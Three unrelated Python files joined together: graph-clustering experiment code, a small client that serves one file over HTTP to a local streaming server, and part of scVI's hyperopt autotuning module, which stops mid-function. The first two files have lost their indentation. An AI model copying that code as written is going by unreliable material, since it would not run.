np.mean(l1reg_PR_curr),np.std(l1reg_PR_curr),
np.mean(l1reg_RC_curr),np.std(l1reg_RC_curr),
np.mean(l1reg_F1_curr),np.std(l1reg_F1_curr),
np.mean(mqi_PR_curr),np.std(mqi_PR_curr),
np.mean(mqi_RC_curr),np.std(mqi_RC_curr),
np.mean(mqi_F1_curr),np.std(mqi_F1_curr),
np.mean(flow_PR_curr),np.std(flow_PR_curr),
np.mean(flow_RC_curr),np.std(flow_RC_curr),
np.mean(flow_F1_curr),np.std(flow_F1_curr)))
q_in,q_out = mp.Queue(),mp.Queue()
for kwargs in kwargs_list:
q_in.put(kwargs)
for _ in range(nprocs):
q_in.put(None)
procs = [mp.Process(target=wrapper,args=(q_in,q_out)) for _ in range(nprocs)]
for p in procs:
p.start()
ncounts = 0
while ncounts < len(kwargs_list):
output = q_out.get()
input_size_all.append((output[0],output[1]))
l1reg_PR_all.append((output[2],output[3]))
l1reg_RC_all.append((output[4],output[5]))
l1reg_F1_all.append((output[6],output[7]))
mqi_PR_all.append((output[8],output[9]))
mqi_RC_all.append((output[10],output[11]))
mqi_F1_all.append((output[12],output[13]))
flow_PR_all.append((output[14],output[15]))
flow_RC_all.append((output[16],output[17]))
flow_F1_all.append((output[18],output[19]))
ncounts += 1
for p in procs:
p.join()
return locals()
def semisupervised_learning(g,truth_dict,kwargs_list,nprocs=1,size_ratio=0.1,use_bfs=True,flowmethod="mqi_weighted",use_spectral=True):
l1reg_PR_all = np.zeros((len(kwargs_list),3))
l1reg_RC_all = np.zeros((len(kwargs_list),3))
l1reg_F1_all = np.zeros((len(kwargs_list),3))
flow_PR_all = np.zeros((len(kwargs_list),3))
flow_RC_all = np.zeros((len(kwargs_list),3))
flow_F1_all = np.zeros((len(kwargs_list),3))
flow_PR_all1 = np.zeros((len(kwargs_list),3))
flow_RC_all1 = np.zeros((len(kwargs_list),3))
flow_F1_all1 = np.zeros((len(kwargs_list),3))
l1reg_PR_curr = defaultdict(list)
l1reg_RC_curr = defaultdict(list)
l1reg_F1_curr = defaultdict(list)
flow_PR_curr = defaultdict(list)
flow_RC_curr = defaultdict(list)
flow_F1_curr = defaultdict(list)
flow_PR_curr1 = defaultdict(list)
flow_RC_curr1 = defaultdict(list)
flow_F1_curr1 = defaultdict(list)
total_vol = np.sum(g.d)
def wrapper(pid,q_in,q_out):
while True:
kwargs,kwargs_id,trial_id,delta,delta1,ratio = q_in.get()
if kwargs is None:
break
nlabels = len(list(truth_dict.keys()))
l1reg_labels = np.zeros(g._num_vertices) - 1
true_labels = np.zeros(g._num_vertices) - 1
flow_labels = np.zeros(g._num_vertices) - 1
flow_labels1 = np.zeros(g._num_vertices) - 1
ranking = np.zeros(g._num_vertices) - 1
npositives = 0
for lid,label in enumerate(sorted(list(truth_dict.keys()))):
truth = truth_dict[label]
npositives += len(truth)
true_labels[truth] = lid
nseeds = int(ratio*len(truth))
np.random.seed(1000*kwargs_id+10*trial_id+lid)
seeds = np.random.choice(truth,nseeds)
if use_spectral:
l1reg_ids,l1reg_vals = approximate_pagerank(g, seeds, **kwargs)
sorted_indices = np.argsort(-1*l1reg_vals)
for i,idx in enumerate(sorted_indices):
if ranking[l1reg_ids[idx]] == -1 or i < ranking[l1reg_ids[idx]]:
ranking[l1reg_ids[idx]] = i
l1reg_labels[l1reg_ids[idx]] = lid
#flow_output1 = flow_clustering(g,seeds,method=flowmethod,delta=curr_vol/(total_vol-curr_vol))[0]
if use_bfs:
seeds = seed_grow_bfs_steps(g,seeds,1)
flow_output = flow_clustering(g,seeds,method=flowmethod,delta=delta)[0]
flow_output1 = flow_clustering(g,seeds,method=flowmethod,delta=delta1)[0]
curr_vol = np.sum(g.d[seeds])
for i,idx in enumerate(flow_output):
if flow_labels[idx] == -1:
flow_labels[idx] = lid
else:
flow_labels[idx] = nlabels + 1
for i,idx in enumerate(flow_output1):
if flow_labels1[idx] == -1:
flow_labels1[idx] = lid
else:
flow_labels1[idx] = nlabels + 1
if use_spectral:
l1reg_PR = np.sum((l1reg_labels == true_labels))/(1.0*np.sum(l1reg_labels!=-1))
l1reg_RC = np.sum((l1reg_labels == true_labels))/(1.0*npositives)
l1reg_F1 = 2*(l1reg_PR*l1reg_RC)/(l1reg_PR+l1reg_RC) if (l1reg_PR+l1reg_RC) > 0 else 0
else:
l1reg_PR,l1reg_RC,l1reg_F1 = 0,0,0
# l1reg_PR_curr.append(l1reg_PR)
# l1reg_RC_curr.append(l1reg_RC)
# l1reg_F1_curr.append()
flow_PR = np.sum((flow_labels == true_labels))/(1.0*np.sum(flow_labels!=-1))
flow_RC = np.sum((flow_labels == true_labels))/(1.0*npositives)
flow_F1 = 2*(flow_PR*flow_RC)/(flow_PR+flow_RC) if (flow_PR+flow_RC) > 0 else 0
flow_PR1 = np.sum((flow_labels1 == true_labels))/(1.0*np.sum(flow_labels1!=-1))
flow_RC1 = np.sum((flow_labels1 == true_labels))/(1.0*npositives)
flow_F11 = 2*(flow_PR1*flow_RC1)/(flow_PR1+flow_RC1) if (flow_PR1+flow_RC1) > 0 else 0
# flow_PR_curr.append(flow_PR)
# flow_RC_curr.append(flow_RC)
# flow_F1_curr.append()
q_out.put((kwargs_id,trial_id,l1reg_PR,l1reg_RC,l1reg_F1,flow_PR,flow_RC,flow_F1,flow_PR1,flow_RC1,flow_F11))
q_in,q_out = mp.Queue(),mp.Queue()
ntrials = 30
for kwargs_id in range(len(kwargs_list)):
kwargs = copy.deepcopy(kwargs_list[kwargs_id])
delta = kwargs["delta"]
del kwargs["delta"]
delta1 = kwargs["delta1"]
del kwargs["delta1"]
ratio = kwargs["ratio"]
del kwargs["ratio"]
for trial_id in range(ntrials):
q_in.put((kwargs,kwargs_id,trial_id,delta,delta1,ratio))
for _ in range(nprocs):
q_in.put((None,None,None,None,None,None))
procs = [mp.Process(target=wrapper,args=(pid,q_in,q_out)) for pid in range(nprocs)]
for p in procs:
p.start()
ncounts = 0
while ncounts < len(kwargs_list)*ntrials:
if ncounts%10 == 0:
print("Finished "+str(ncounts)+"/"+str(len(kwargs_list)*ntrials)+" experiments.")
kwargs_id,trial_id,l1reg_PR,l1reg_RC,l1reg_F1,flow_PR,flow_RC,flow_F1,flow_PR1,flow_RC1,flow_F11 = q_out.get()
l1reg_PR_curr[kwargs_id].append(l1reg_PR)
l1reg_RC_curr[kwargs_id].append(l1reg_RC)
l1reg_F1_curr[kwargs_id].append(l1reg_F1)
flow_PR_curr[kwargs_id].append(flow_PR)
flow_RC_curr[kwargs_id].append(flow_RC)
flow_F1_curr[kwargs_id].append(flow_F1)
flow_PR_curr1[kwargs_id].append(flow_PR1)
flow_RC_curr1[kwargs_id].append(flow_RC1)
flow_F1_curr1[kwargs_id].append(flow_F11)
if trial_id == ntrials - 1:
l1reg_PR_all[kwargs_id] = [np.median(l1reg_PR_curr[kwargs_id]),np.percentile(l1reg_PR_curr[kwargs_id],q=20),
np.percentile(l1reg_PR_curr[kwargs_id],q=80)]
l1reg_RC_all[kwargs_id] = [np.median(l1reg_RC_curr[kwargs_id]),np.percentile(l1reg_RC_curr[kwargs_id],q=20),
np.percentile(l1reg_RC_curr[kwargs_id],q=80)]
l1reg_F1_all[kwargs_id] = [np.median(l1reg_F1_curr[kwargs_id]),np.percentile(l1reg_F1_curr[kwargs_id],q=20),
np.percentile(l1reg_F1_curr[kwargs_id],q=80)]
flow_PR_all[kwargs_id] = [np.median(flow_PR_curr[kwargs_id]),np.percentile(flow_PR_curr[kwargs_id],q=20),
np.percentile(flow_PR_curr[kwargs_id],q=80)]
flow_RC_all[kwargs_id] = [np.median(flow_RC_curr[kwargs_id]),np.percentile(flow_RC_curr[kwargs_id],q=20),
np.percentile(flow_RC_curr[kwargs_id],q=80)]
flow_F1_all[kwargs_id] = [np.median(flow_F1_curr[kwargs_id]),np.percentile(flow_F1_curr[kwargs_id],q=20),
np.percentile(flow_F1_curr[kwargs_id],q=80)]
flow_PR_all1[kwargs_id] = [np.median(flow_PR_curr1[kwargs_id]),np.percentile(flow_PR_curr1[kwargs_id],q=20),
np.percentile(flow_PR_curr1[kwargs_id],q=80)]
flow_RC_all1[kwargs_id] = [np.median(flow_RC_curr1[kwargs_id]),np.percentile(flow_RC_curr1[kwargs_id],q=20),
np.percentile(flow_RC_curr1[kwargs_id],q=80)]
flow_F1_all1[kwargs_id] = [np.median(flow_F1_curr1[kwargs_id]),np.percentile(flow_F1_curr1[kwargs_id],q=20),
np.percentile(flow_F1_curr1[kwargs_id],q=80)]
ncounts += 1
for p in procs:
p.join()
del procs
del p
del q_in
del q_out
del wrapper
return locals()
def seed_grow_bfs_steps(g,seeds,steps):
"""
Grow the initial seed set by a given number of BFS steps; each step adds all
unvisited neighbors of the current frontier to the seed set.
"""
Q = queue.Queue()
visited = np.zeros(g._num_vertices)
visited[seeds] = 1
for s in seeds:
Q.put(s)
if isinstance(seeds,np.ndarray):
seeds = seeds.tolist()
else:
seeds = list(seeds)
for step in range(steps):
for k in range(Q.qsize()):
node = Q.get()
si,ei = g.adjacency_matrix.indptr[node],g.adjacency_matrix.indptr[node+1]
neighs = g.adjacency_matrix.indices[si:ei]
for i in range(len(neighs)):
if visited[neighs[i]] == 0:
visited[neighs[i]] = 1
seeds.append(neighs[i])
Q.put(neighs[i])
return seeds
def seed_grow_bfs_size(g,seeds,nseeds):
"""
Grow the initial seed set through BFS until it contains nseeds nodes.
"""
Q = queue.Queue()
visited = np.zeros(g._num_vertices)
visited[seeds] = 1
for s in seeds:
Q.put(s)
if isinstance(seeds,np.ndarray):
seeds = seeds.tolist()
else:
seeds = list(seeds)
while len(seeds) < nseeds:
node = Q.get()
si,ei = g.adjacency_matrix.indptr[node],g.adjacency_matrix.indptr[node+1]
neighs = g.adjacency_matrix.indices[si:ei]
for i in range(len(neighs)):
if visited[neighs[i]] == 0:
visited[neighs[i]] = 1
seeds.append(neighs[i])
Q.put(neighs[i])
if len(seeds) == nseeds:
break
return seeds
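# Hedged sketch of the two BFS helpers above (the seed list is illustrative):
#
#   seeds = [0, 17, 42]
#   grown_by_steps = seed_grow_bfs_steps(g, seeds, 2)     # expand two BFS rings
#   grown_by_size = seed_grow_bfs_size(g, seeds, 200)     # stop at 200 nodes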
|
client.py
|
import os
import sys
import socket
import secrets
import tempfile
import http.server
import socketserver
from threading import Thread
from urllib.request import urlopen
PORT = 4040
BEAM_SERVER = '192.168.0.3:5005'
d = tempfile.TemporaryDirectory()
print("using tempdir " + d.name)
def handler_for_dir(dir):
def myhandler(*args, **kwargs):
kwargs['directory'] = dir
return http.server.SimpleHTTPRequestHandler(*args, **kwargs)
return myhandler
def get_request(url):
resp = urlopen(url)
return (200 <= resp.status <= 299, "\n".join([d.decode() for d in resp.readlines()]))
# get ip address (sourced from https://stackoverflow.com/a/28950776/4141651)
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
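# Usage (the path below is illustrative):
#   python client.py /path/to/video.mp4
# The file is symlinked into a temporary directory and served over plain HTTP on
# PORT, and the beam server at BEAM_SERVER is given this host and port so it can
# fetch the exposed /stream file.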
target = sys.argv[1]
id = secrets.token_hex(16)
# symlink target to tempdir so we only expose a single file
os.symlink(os.path.abspath(target), d.name + '/stream')
handler = handler_for_dir(d.name + '/')
token = None
try:
with http.server.HTTPServer(("0.0.0.0", PORT), handler) as httpd:
try:
print("serving at port", PORT)
t = Thread(target=httpd.serve_forever)
t.start()
print("calling beam target...")
host = get_ip()
resp = get_request(f'http://{BEAM_SERVER}/open?host={host}&port={PORT}')
if resp[0]:
token = resp[1].strip()
print(f"successfully started video - session {token}")
input("Just press enter when you are done...")
else:
print("Error statrtig video!")
finally:
print("shutting down server")
httpd.shutdown()
finally:
print("cleaning up")
if token:
get_request(f'http://{BEAM_SERVER}/stop/{token}')
d.cleanup()
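# Hedged usage note (illustrative): run this client with the media file to
# expose as its single argument, e.g.
#   python client.py /path/to/video.mp4
# The beam server at BEAM_SERVER is assumed to accept the two endpoints used
# above: GET /open?host=<ip>&port=<port> to start playback and
# GET /stop/<token> to stop the session.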
|
autotune.py
|
import datetime
import logging
import multiprocessing
import os
import pickle
import sys
import time
import threading
from collections import defaultdict
from functools import partial, wraps
from io import IOBase
from logging.handlers import QueueListener, QueueHandler
from subprocess import Popen
from typing import Any, Callable, Dict, List, Tuple, Type, Union
from queue import Empty
from hyperopt import fmin, tpe, Trials, hp, STATUS_OK, STATUS_FAIL
from hyperopt.mongoexp import (
as_mongo_str,
MongoJobs,
MongoTrials,
MongoWorker,
ReserveTimeout,
)
import numpy as np
import torch
import tqdm
from scvi.dataset import GeneExpressionDataset
from scvi.models import VAE
from . import Trainer, UnsupervisedTrainer
# TODO: add database watcher and visualizations
# TODO: make worker_launcher a subclass of threading.Thread
# TODO: and hyperopt_worker a subclass of multiprocessing.Process
# spawning is required for processes relying on cuda
spawn_ctx = multiprocessing.get_context("spawn")
fork_ctx = multiprocessing.get_context("fork")
# register running process and open files to terminate/close at exit
started_processes: List[Union[multiprocessing.Process, Popen, QueueListener]] = []
started_threads: List[threading.Thread] = []
open_files: List[IOBase] = []
# instantiate logger, handler and formatter
logger = logging.getLogger(__name__)
formatter = logging.Formatter(
"[%(asctime)s - %(processName)s - %(threadName)s] %(levelname)s - %(name)s\n%(message)s"
)
ch = logging.StreamHandler()
ch.setFormatter(formatter)
# instantiate hyperopt and autotune file handlers as global variables for clean up
fh_hyperopt = None
fh_autotune = None
# global Event to stop threads when cleaning up
cleanup_event = threading.Event()
class FminTimeoutError(Exception):
"""Thrown if fmin process hasn't finished in the allotted
time after all workers have died.
"""
class DispatchHandler:
"""A simple handler for logging events. It dispatches events to loggers
    based on the name in the received record; the logging system then
    dispatches them to the handlers configured for those loggers.
"""
def handle(self, record: logging.LogRecord):
logger = logging.getLogger(record.name)
if record.levelno >= logger.level:
logger.handle(record)
class ProgressHandler:
"""A simple handler for keeping track of the worker's progress.
When assigned to a logger, logs sent using that logger trigger
an update of the progress bar associated with this handler.
"""
def __init__(self, pbar: tqdm.tqdm, disable: bool):
self.level = 0
self.pbar = pbar
self.disabled = disable
def handle(self, record: logging.LogRecord):
if not self.disabled:
self.pbar.update()
# cleanup helpers
def _cleanup_processes_files():
"""Cleanup function, starts with latest processes/files.
Terminates processes, sets cleanup_event to stop threads, closes open files."""
logger.info("Cleaning up")
logger.debug("Cleaning up: closing files")
for f in open_files[::-1]:
if not f.closed:
f.close()
logger.debug("Cleaning up: setting cleanup_event and joining threads")
    cleanup_event.set()
for t in started_threads[::-1]:
if t.is_alive():
t.join()
logger.debug("Cleaning up: terminating processes")
for p in started_processes[::-1]:
if isinstance(p, Popen):
            if p.poll() is None:
p.terminate()
if isinstance(p, multiprocessing.Process):
if p.is_alive():
p.terminate()
if isinstance(p, QueueListener):
if p._thread is not None:
p.stop()
def _cleanup_logger():
"""Removes added handlers."""
logger.debug("Cleaning up: removing added logging handler")
    for handler in list(logger.handlers):
        if handler == ch:
            logger.removeHandler(ch)
        if handler == fh_autotune:
            logger.removeHandler(fh_autotune)
    hp_logger = logging.getLogger("hyperopt")
    for handler in list(hp_logger.handlers):
        if handler == fh_hyperopt:
            hp_logger.removeHandler(fh_hyperopt)
def _cleanup_decorator(func: Callable):
"""Decorates top-level calls in order to launch cleanup when an Exception is caught."""
@wraps(func)
def decorated(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
logger.exception(
"Caught {exception} in {func}, starting cleanup".format(
exception=e.args, func=func.__name__
)
)
_cleanup_processes_files()
_cleanup_logger()
raise
return decorated
def auto_tune_scvi_model(
exp_key: str,
gene_dataset: GeneExpressionDataset,
objective_hyperopt: Callable = None,
model_class: VAE = VAE,
trainer_class: Trainer = UnsupervisedTrainer,
model_specific_kwargs: dict = None,
trainer_specific_kwargs: dict = None,
train_func_specific_kwargs: dict = None,
space: dict = None,
max_evals: int = 100,
train_best: bool = True,
pickle_result: bool = True,
save_path: str = ".",
use_batches: bool = False,
parallel: bool = True,
n_cpu_workers: int = None,
gpu_ids: List[int] = None,
n_workers_per_gpu: int = 1,
reserve_timeout: float = 30.0,
fmin_timeout: float = 300.0,
fmin_timer: float = None,
mongo_port: str = "1234",
mongo_host: str = "localhost",
db_name: str = "scvi_db",
multiple_hosts: bool = False,
) -> Union[Tuple[Type[Trainer], Trials], Trials]:
"""Perform automatic hyperparameter optimization of an scVI model
and return best model and hyperopt Trials object.
``Trials`` object contains hyperparameter space and loss history for each trial.
We provide a default hyperparameter search space (see source code),
but we recommend the user to build a custom one for each application.
Convention: fixed parameters (no default) have precedence over tunable parameters (default).
Note that the verbosity of this function has to be set using the logging module.
In particular, for the parallel case, only a progress bar is shown if the
    logging level is equal to or higher than ``logging.WARNING``.
:param exp_key: Name of the experiment in MongoDb.
If already exists in db, ``hyperopt`` will run a number of trainings equal to
the difference between current and previous ``max_evals``.
:param gene_dataset: scVI gene dataset.
:param objective_hyperopt: A custom objective function respecting the ``hyperopt`` format.
Roughly, it needs to return the quantity to optimize for, either directly
or in a ``dict`` under the "loss" key.
See https://github.com/hyperopt/hyperopt/wiki for a more detailed explanation.
By default, we provide an objective function which can be parametrized
through the various arguments of this function (``gene_dataset``, ``model_class``, etc.)
:param model_class: scVI model class (e.g ``VAE``, ``VAEC``, ``SCANVI``)
:param trainer_class: ``Trainer`` sub-class (e.g ``UnsupervisedTrainer``)
:param model_specific_kwargs: ``dict`` of fixed parameters which will be passed to the model.
:param trainer_specific_kwargs: ``dict`` of fixed parameters which will be passed to the trainer.
:param train_func_specific_kwargs: dict of fixed parameters which will be passed to the train method.
:param space: dict containing up to three sub-dicts with keys "model_tunable_kwargs",
"trainer_tunable_kwargs" or "train_func_tunable_kwargs".
Each of those dict contains ``hyperopt`` defined parameter spaces (e.g. ``hp.choice(..)``)
which will be passed to the corresponding object : model, trainer or train method
when performing hyper-optimization. Default: mutable, see source code.
:param max_evals: Maximum number of evaluations of the objective.
:param train_best: If ``True``, train best model and return it.
:param pickle_result: If ``True``, pickle ``Trials`` and ``Trainer`` objects using ``save_path``.
:param save_path: Path where to save best model, trainer, trials and mongo files.
:param use_batches: If ``False``, pass ``n_batch=0`` to model else pass ``gene_dataset.n_batches``.
:param parallel: If ``True``, use ``MongoTrials`` object to run trainings in parallel.
:param n_cpu_workers: Number of cpu workers to launch. If None, and no GPUs are found,
        defaults to ``os.cpu_count() - 1``. Else, defaults to 0.
:param gpu_ids: Ids of the GPUs to use. If None defaults to all GPUs found by ``torch``.
Note that considered gpu ids are int from 0 to ``torch.cuda.device_count()``.
:param n_workers_per_gpu: Number of workers to launch per gpu found by ``torch``.
:param reserve_timeout: Amount of time, in seconds, a worker tries to reserve a job for
before throwing a ``ReserveTimeout`` Exception.
:param fmin_timeout: Amount of time, in seconds, fmin_process has to terminate
after all workers have died - before throwing a ``FminTimeoutError``.
If ``multiple_hosts`` is set to ``True``, this is set to ``None`` to prevent timing out.
:param fmin_timer: Global amount of time allowed for fmin_process.
If not None, the minimization procedure will be stopped after ``fmin_timer`` seconds.
Used only if ``parallel`` is set to ``True``.
:param mongo_port: Port to the Mongo db.
:param mongo_host: Hostname used with ``mongo_port`` to indicate the prefix of the mongodb address.
The prefix of the address passed onto the workers and ``MongoTrials`` object
is ``'{mongo_host}:{mongo_port}'``.
:param db_name: Name to use when creating the Mongo database. Suffix of the Mongo address.
:param multiple_hosts: If ``True``, user is considered to have workers launched on several machines.
Therefore, setting this to ``True`` disables the ``fmin_timeout`` behaviour.
:return: ``Trainer`` object for the best model and ``(Mongo)Trials`` object containing logs for the different runs.
Examples:
>>> from scvi.dataset import CortexDataset
>>> gene_dataset = CortexDataset()
>>> best_trainer, trials = auto_tune_scvi_model(gene_dataset)
"""
if fmin_timer and train_best:
logger.warning(
"fmin_timer and train_best are both set to True. "
"This means that runtime will exceed fmin_timer "
"by at least the time it takes to complete a full training."
)
# if no handlers add console handler, add formatter to handlers
if len(logger.handlers) < 1:
logger.addHandler(ch)
else:
# if no formatter add default module formatter
for handler in logger.handlers:
if not handler.formatter:
handler.setFormatter(formatter)
    # also add file handler
    global fh_autotune
    fh_autotune = logging.FileHandler(
os.path.join(save_path, "scvi_autotune_logfile.txt")
)
fh_autotune.setFormatter(formatter)
fh_autotune.setLevel(logging.DEBUG)
logger.addHandler(fh_autotune)
logger.info("Starting experiment: {exp_key}".format(exp_key=exp_key))
# default specific kwargs
model_specific_kwargs = model_specific_kwargs if model_specific_kwargs else {}
trainer_specific_kwargs = trainer_specific_kwargs if trainer_specific_kwargs else {}
train_func_specific_kwargs = (
train_func_specific_kwargs if train_func_specific_kwargs else {}
)
# default early stopping
if "early_stopping_kwargs" not in trainer_specific_kwargs:
logger.debug("Adding default early stopping behaviour.")
early_stopping_kwargs = {
"early_stopping_metric": "elbo",
"save_best_state_metric": "elbo",
"patience": 50,
"threshold": 0,
"reduce_lr_on_plateau": True,
"lr_patience": 25,
"lr_factor": 0.2,
}
trainer_specific_kwargs["early_stopping_kwargs"] = early_stopping_kwargs
# add elbo to metrics to monitor
metrics_to_monitor = trainer_specific_kwargs.get("metrics_to_monitor", [])
metrics_to_monitor.append("elbo")
trainer_specific_kwargs["metrics_to_monitor"] = metrics_to_monitor
# default search space
if space is None:
logger.debug("Using default parameter search space.")
space = {
"model_tunable_kwargs": {
"n_latent": 5 + hp.randint("n_latent", 11), # [5, 15]
"n_hidden": hp.choice("n_hidden", [64, 128, 256]),
"n_layers": 1 + hp.randint("n_layers", 5),
"dropout_rate": hp.choice("dropout_rate", [0.1, 0.3, 0.5, 0.7]),
"reconstruction_loss": hp.choice("reconstruction_loss", ["zinb", "nb"]),
},
"train_func_tunable_kwargs": {
"lr": hp.choice("lr", [0.01, 0.005, 0.001, 0.0005, 0.0001])
},
}
logger.info(
"Fixed parameters: \n"
"model: \n"
+ str(model_specific_kwargs)
+ "\n"
+ "trainer: \n"
+ str(trainer_specific_kwargs)
+ "\n"
+ "train method: \n"
+ str(train_func_specific_kwargs)
)
# build a partial objective function restricted to the search space
if objective_hyperopt is None:
objective_hyperopt = partial(
_objective_function,
**{
"gene_dataset": gene_dataset,
"model_class": model_class,
"trainer_class": trainer_class,
"model_specific_kwargs": model_specific_kwargs,
"trainer_specific_kwargs": trainer_specific_kwargs,
"train_func_specific_kwargs": train_func_specific_kwargs,
"use_batches": use_batches,
},
)
if parallel:
logger.info("Starting parallel hyperoptimization")
trials = _auto_tune_parallel(
objective_hyperopt=objective_hyperopt,
exp_key=exp_key,
space=space,
max_evals=max_evals,
save_path=save_path,
n_cpu_workers=n_cpu_workers,
gpu_ids=gpu_ids,
n_workers_per_gpu=n_workers_per_gpu,
reserve_timeout=reserve_timeout,
fmin_timeout=fmin_timeout,
fmin_timer=fmin_timer,
mongo_port=mongo_port,
mongo_host=mongo_host,
db_name=db_name,
multiple_hosts=multiple_hosts,
)
else:
logger.info("Starting sequential hyperoptimization")
trials = Trials()
# run hyperoptimization
_ = fmin(
fn=objective_hyperopt,
space=space,
algo=tpe.suggest,
max_evals=max_evals,
trials=trials,
)
# return best model, trained
if train_best:
logger.debug("Training best model with full training set")
best_space = trials.best_trial["result"]["space"]
best_trainer = objective_hyperopt(best_space, is_best_training=True)
if pickle_result:
if train_best:
logger.debug("Pickling best model and trainer")
# pickle trainer and save model (overkill?)
with open(
os.path.join(save_path, "best_trainer_{key}".format(key=exp_key)), "wb"
) as f:
pickle.dump(best_trainer, f)
torch.save(
best_trainer.model.state_dict(),
os.path.join(save_path, "best_model_{key}".format(key=exp_key)),
)
# remove object containing thread.lock (otherwise pickle.dump throws)
logger.debug("Pickling Trials object")
if hasattr(trials, "handle"):
del trials.handle
with open(
os.path.join(save_path, "trials_{key}".format(key=exp_key)), "wb"
) as f:
pickle.dump(trials, f)
# remove added logging handlers/formatters
_cleanup_logger()
if train_best:
return best_trainer, trials
else:
return trials
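# Hedged usage sketch (not part of the original module): a minimal sequential
# call to `auto_tune_scvi_model` with a small custom search space.  The
# dataset, experiment key and evaluation budget below are placeholders chosen
# for illustration only.
def _auto_tune_example():
    from scvi.dataset import CortexDataset

    gene_dataset = CortexDataset()
    space = {
        "model_tunable_kwargs": {
            "n_latent": 5 + hp.randint("n_latent", 11),
            "dropout_rate": hp.choice("dropout_rate", [0.1, 0.5]),
        },
        "train_func_tunable_kwargs": {
            "lr": hp.choice("lr", [1e-3, 1e-4]),
        },
    }
    best_trainer, trials = auto_tune_scvi_model(
        exp_key="cortex_demo",
        gene_dataset=gene_dataset,
        space=space,
        max_evals=5,      # tiny budget, just to illustrate the call
        parallel=False,   # skip the MongoDb/worker machinery in this sketch
    )
    return best_trainer, trials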
def _auto_tune_parallel(
objective_hyperopt: Callable,
exp_key: str,
space: dict = None,
max_evals: int = 100,
save_path: str = ".",
n_cpu_workers: int = None,
gpu_ids: List[int] = None,
n_workers_per_gpu: int = 1,
reserve_timeout: float = 30.0,
fmin_timeout: float = 60.0,
fmin_timer: float = None,
mongo_port: str = "1234",
mongo_host: str = "localhost",
db_name: str = "scvi_db",
multiple_hosts: bool = False,
) -> MongoTrials:
"""Parallel version of the hyperoptimization procedure.
Called by ``auto_tune_scvi_model`` when ``parallel=True``.
Specifically, first the MongoDb service is launched in its own forked process.
Then, the call to the minimization process is made in its own forked process.
Then, the call ``worker_launcher`` is made in its own Thread.
After that, the program waits for either the minimization
process to finish or for the workers to all timeout.
When one of these conditions is verified the program kills the waiter for the other
and tries to dequeue the results from the minimization process.
At that point, if ``multiple_hosts`` is set to True, the program waits indefinitely
for the minimization process to put the results in the queue.
If not, the minimisation process has ``fmin_timeout`` seconds to finish.
This mechanism ensures that the program does not hang if, for any reason,
the workers die before completing all the jobs.
Note that logs to the ``hyperopt`` package are automatically stored in ``./hyperopt_logfile.txt``.
Note that the progress bar is automatically disabled if the logging level
for ``scvi.inference.autotune`` is lower than logging.WARNING.
:param objective_hyperopt: Callable, the objective function to minimize
:param exp_key: Name of the experiment in MongoDb.
:param space: ``dict`` containing up to three sub-dicts with keys "model_tunable_kwargs",
"trainer_tunable_kwargs" or "train_func_tunable_kwargs".
Each of those dict contains ``hyperopt`` defined parameter spaces (e.g. ``hp.choice(..)``)
which will be passed to the corresponding object : model, trainer or train method
when performing hyperoptimization. Default: mutable, see source code.
:param max_evals: Maximum number of evaluations of the objective.
:param save_path: Path where to save best model, trainer, trials and mongo files.
:param n_cpu_workers: Number of cpu workers to launch. If None, and no GPUs are found,
        defaults to ``os.cpu_count() - 1``. Else, defaults to 0.
:param gpu_ids: Ids of the GPUs to use. If None defaults to all GPUs found by ``torch``.
Note that considered gpu ids are int from ``0`` to ``torch.cuda.device_count()``.
    :param n_workers_per_gpu: Number of workers to launch per gpu found by ``torch``.
:param reserve_timeout: Amount of time, in seconds, a worker tries to reserve a job for
before throwing a ``ReserveTimeout`` Exception.
:param fmin_timeout: Amount of time, in seconds, ``fmin_process`` has to terminate
after all workers have died - before throwing a ``FminTimeoutError``.
        If ``multiple_hosts`` is set to ``True``, this is set to ``None`` to disable the timeout behaviour.
:param fmin_timer: Global amount of time allowed for fmin_process.
If not None, the minimization procedure will be stopped after ``fmin_timer`` seconds.
Used only if ``parallel`` is set to ``True``.
:param mongo_port: Port to the mongo db.
:param mongo_host: Hostname used with mongo_port to indicate the prefix of the mongodb address.
The prefix of the address passed onto the workers and MongoTrials object is ``'{mongo_host}:{mongo_port}'``.
:param db_name: Name to use when creating the Mongo database. Suffix of the mongo address.
:param multiple_hosts: If ``True``, user is considered to have workers launched on several machines.
Therefore, setting this to ``True`` disables the ``fmin_timeout`` behaviour.
:return: ``MongoTrials`` object containing the results of the program.
"""
# run mongod bash script
mongo_path = os.path.join(save_path, "mongo")
if not os.path.exists(mongo_path):
os.makedirs(mongo_path)
mongo_logfile = open(os.path.join(mongo_path, "mongo_logfile.txt"), "w")
open_files.append(mongo_logfile)
logger.debug(
"Starting MongoDb process, logs redirected to "
"{name}.".format(name=mongo_logfile.name)
)
mongod_process = Popen(
[
"mongod",
"--quiet",
"--dbpath={path}".format(path=mongo_path),
"--port={port}".format(port=mongo_port),
],
stdout=mongo_logfile,
)
mongo_port_address = os.path.join(mongo_host + ":" + mongo_port, db_name)
started_processes.append(mongod_process)
# log hyperopt to file
    global fh_hyperopt
    hp_logger = logging.getLogger("hyperopt")
    fh_hyperopt = logging.FileHandler(os.path.join(save_path, "hyperopt_logfile.txt"))
fh_hyperopt.setFormatter(formatter)
hp_logger.addHandler(fh_hyperopt)
# add progress handler to progress logger
progress_logger = logging.getLogger("progress_logger")
disable = multiple_hosts or (logger.level < logging.WARNING)
pbar = tqdm.tqdm(total=max_evals, disable=disable)
progress_logger.addHandler(ProgressHandler(pbar=pbar, disable=disable))
# start by running fmin process so that workers don't timeout
# run hyperoptimization, in a forked process
# this allows to warn if the workers crash
# since mongo is not thread-safe, trials must be instantiated in each child
logger.debug("Starting minimization procedure")
queue = fork_ctx.Queue()
fmin_kwargs = {
"queue": queue,
"fn": objective_hyperopt,
"exp_key": exp_key,
"space": space,
"algo": tpe.suggest,
"max_evals": max_evals,
"fmin_timer": fmin_timer,
"show_progressbar": False, # progbar useless in parallel mode
"mongo_port_address": mongo_port_address,
}
fmin_process = fork_ctx.Process(
target=_fmin_parallel, kwargs=fmin_kwargs, name="fmin Process"
)
fmin_process.start()
started_processes.append(fmin_process)
# start worker launcher
logger.debug("Starting worker launcher")
stop_watchdog_event = threading.Event()
launcher_kwargs = {
"stop_watchdog_event": stop_watchdog_event,
"exp_key": exp_key,
"n_cpu_workers": n_cpu_workers,
"gpu_ids": gpu_ids,
"n_workers_per_gpu": n_workers_per_gpu,
